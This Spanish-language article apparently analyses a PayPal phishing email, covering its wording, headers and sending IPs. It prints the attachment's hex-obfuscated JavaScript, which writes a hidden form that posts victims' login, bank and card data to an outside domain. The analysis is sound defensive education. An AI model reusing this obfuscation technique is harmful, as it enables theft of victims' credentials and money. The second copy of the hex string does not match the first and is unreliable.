En el mundo actual, donde la información de todos está en línea, el phishing es uno de los ataques en línea más populares y devastadores, porque siempre se puede limpiar un virus, pero si le roban sus datos bancarios, tiene problemas. Aquí hay un desglose de uno de esos ataques que recibimos.
No piense que son solo sus datos bancarios los que son importantes: después de todo, si alguien obtiene el control sobre el inicio de sesión de su cuenta, no solo conoce la información contenida en esa cuenta, sino que lo más probable es que la misma información de inicio de sesión se pueda usar en varios otros cuentas. Y si comprometen su cuenta de correo electrónico, pueden restablecer todas sus otras contraseñas.
Entonces, además de mantener contraseñas fuertes y variables, siempre debe estar atento a los correos electrónicos falsos que se hacen pasar por los reales. Si bien la mayoría de los intentos de phishing son de aficionados, algunos son bastante convincentes, por lo que es importante comprender cómo reconocerlos a nivel superficial y cómo funcionan bajo el capó.
Imagen de asirap
Examinar lo que está a la vista
Nuestro correo electrónico de ejemplo, como la mayoría de los intentos de suplantación de identidad (phishing), le “notifica” de la actividad en su cuenta PayPal que, en circunstancias normales, sería alarmante. Por lo tanto, la llamada a la acción es verificar / restaurar su cuenta enviando casi toda la información personal que pueda imaginar. Una vez más, esto es bastante formulista.
Si bien ciertamente hay excepciones, casi todos los correos electrónicos fraudulentos y de phishing se cargan con banderas rojas directamente en el mensaje. Incluso si el texto es convincente, generalmente puede encontrar muchos errores esparcidos por todo el cuerpo del mensaje que indican que el mensaje no es legítimo.
El cuerpo del mensaje
A primera vista, este es uno de los mejores correos electrónicos de phishing que he visto. No hay errores ortográficos o gramaticales y la verborrea se lee de acuerdo con lo que cabría esperar. Sin embargo, hay algunas señales de alerta que puede ver cuando examina el contenido un poco más de cerca.
- “Paypal”: el caso correcto es “PayPal” (P mayúscula). Puede ver que ambas variaciones se utilizan en el mensaje. Las empresas son muy deliberadas con su marca, por lo que es dudoso que algo como esto pase el proceso de revisión.
- “Permitir ActiveX” - ¿Cuántas veces ha visto una empresa legítima basada en la web del tamaño de Paypal que usa un componente propietario que solo funciona en un solo navegador, especialmente cuando admite varios navegadores? Claro, en algún lugar lo hace alguna empresa, pero esto es una señal de alerta.
- "De forma segura". - Observe cómo esta palabra no se alinea en el margen con el resto del texto del párrafo. Incluso si estiro la ventana un poco más, no se ajusta ni se espacia correctamente.
- "¡Paypal!" - El espacio antes del signo de exclamación parece extraño. Solo otra peculiaridad que estoy seguro de que no estaría en un correo electrónico legítimo.
- “PayPal- Formulario de actualización de cuenta.pdf.htm”: ¿Por qué Paypal adjuntaría un “PDF”, especialmente cuando solo podían vincular a una página de su sitio? Además, ¿por qué intentarían disfrazar un archivo HTML como PDF? Esta es la mayor bandera roja de todas.
El encabezado del mensaje
Cuando echas un vistazo al encabezado del mensaje, aparecen un par de banderas rojas más:
- La dirección de origen es [email protected] .
- Falta la dirección a. No lo dejé en blanco, simplemente no forma parte del encabezado de mensaje estándar. Normalmente, una empresa que tiene su nombre le personalizará el correo electrónico.
El adjunto
Cuando abro el archivo adjunto, puede ver inmediatamente que el diseño no es correcto ya que le falta información de estilo. Nuevamente, ¿por qué PayPal enviaría por correo electrónico un formulario HTML cuando simplemente podrían darle un enlace en su sitio?
Nota: Usamos el visor de archivos adjuntos HTML integrado de Gmail para esto, pero le recomendamos que NO ABRA archivos adjuntos de estafadores. Nunca. Siempre. Muy a menudo contienen exploits que instalarán troyanos en su PC para robar la información de su cuenta.
Desplazándose un poco más hacia abajo, puede ver que este formulario solicita no solo nuestra información de inicio de sesión de PayPal, sino también la información bancaria y de la tarjeta de crédito. Algunas de las imágenes están rotas.
Es obvio que este intento de phishing persigue todo de un solo golpe.
El desglose técnico
Si bien debería quedar bastante claro en función de lo que está a la vista de que se trata de un intento de phishing, ahora vamos a desglosar la composición técnica del correo electrónico y ver qué podemos encontrar.
Información del adjunto
Lo primero que hay que ver es la fuente HTML del formulario adjunto, que es lo que envía los datos al sitio falso.
Al ver rápidamente la fuente, todos los enlaces parecen válidos ya que apuntan a "paypal.com" o "paypalobjects.com", que son ambos legítimos.
Ahora vamos a echar un vistazo a la información básica de la página que Firefox recopila en la página.
Como puede ver, algunos de los gráficos se extraen de los dominios "blessedtobe.com", "goodhealthpharmacy.com" y "pic-upload.de" en lugar de los dominios legítimos de PayPal.
Información de los encabezados de correo electrónico
A continuación, veremos los encabezados de los mensajes de correo electrónico sin procesar. Gmail hace que esto esté disponible a través de la opción de menú Mostrar original en el mensaje.
Al mirar la información del encabezado del mensaje original, puede ver que este mensaje se redactó con Outlook Express 6. Dudo que PayPal tenga a alguien en el personal que envíe cada uno de estos mensajes manualmente a través de un cliente de correo electrónico desactualizado.
Ahora, mirando la información de enrutamiento, podemos ver la dirección IP tanto del remitente como del servidor de correo de retransmisión.
La dirección IP del "Usuario" es el remitente original. Al hacer una búsqueda rápida en la información de IP, podemos ver que la IP de envío está en Alemania.
Y cuando miramos la dirección IP del servidor de correo de retransmisión (mail.itak.at), podemos ver que se trata de un ISP con sede en Austria. Dudo que PayPal enrute sus correos electrónicos directamente a través de un ISP con sede en Austria cuando tienen una granja de servidores masiva que podría manejar fácilmente esta tarea.
¿A dónde van los datos?
Por lo tanto, hemos determinado claramente que se trata de un correo electrónico de phishing y recopilamos información sobre el origen del mensaje, pero ¿qué pasa con el lugar al que se envían sus datos?
Para ver esto, primero tenemos que guardar el archivo adjunto HTM en nuestro escritorio y abrirlo en un editor de texto. Al desplazarse por él, todo parece estar en orden, excepto cuando llegamos a un bloque de JavaScript de aspecto sospechoso.
Desglosando la fuente completa del último bloque de Javascript, vemos:
<script language = ”JavaScript” type = ”text / javascript”>
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i <x.length; i + = 2) {y+=unescape(‘%’+x.substr(i,2));}document.write (y);
</script>
Cada vez que ve una cadena grande y desordenada de letras y números aparentemente aleatorios incrustados en un bloque de Javascript, generalmente es algo sospechoso. Mirando el código, la variable "x" se establece en esta cadena grande y luego se decodifica en la variable "y". El resultado final de la variable "y" se escribe en el documento como HTML.
Dado que la cadena grande está formada por números del 0 al 9 y las letras a-f, lo más probable es que esté codificada mediante una conversión simple de ASCII a hexadecimal:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657826732742f737637265726f706267327272
Se traduce a:
<form name = ”main” id = ”main” method = ”post” action = ”http://www.dexposure.net/bbs/data/verify.php”>
No es una coincidencia que esto se decodifique en una etiqueta de formulario HTML válida que envíe los resultados no a PayPal, sino a un sitio fraudulento.
Además, cuando vea la fuente HTML del formulario, verá que esta etiqueta de formulario no es visible porque se genera dinámicamente a través de Javascript. Esta es una forma inteligente de ocultar lo que realmente está haciendo el HTML si alguien simplemente viera la fuente generada del archivo adjunto (como hicimos anteriormente) en lugar de abrir el archivo adjunto directamente en un editor de texto.
Al ejecutar un whois rápido en el sitio ofensivo, podemos ver que este es un dominio alojado en un servidor web popular, 1and1.
Lo que se destaca es que el dominio usa un nombre legible (a diferencia de algo como “dfh3sjhskjhw.net”) y el dominio ha sido registrado durante 4 años. Debido a esto, creo que este dominio fue secuestrado y utilizado como peón en este intento de phishing.
El cinismo es una buena defensa
Cuando se trata de mantenerse seguro en línea, nunca está de más tener un poco de cinismo.
Si bien estoy seguro de que hay más banderas rojas en el correo electrónico de ejemplo, lo que hemos señalado anteriormente son indicadores que vimos después de unos minutos de examen. Hipotéticamente, si el nivel superficial del correo electrónico imitara al 100% a su contraparte legítima, el análisis técnico aún revelaría su verdadera naturaleza. Por eso es importante poder examinar tanto lo que se puede ver como lo que no.
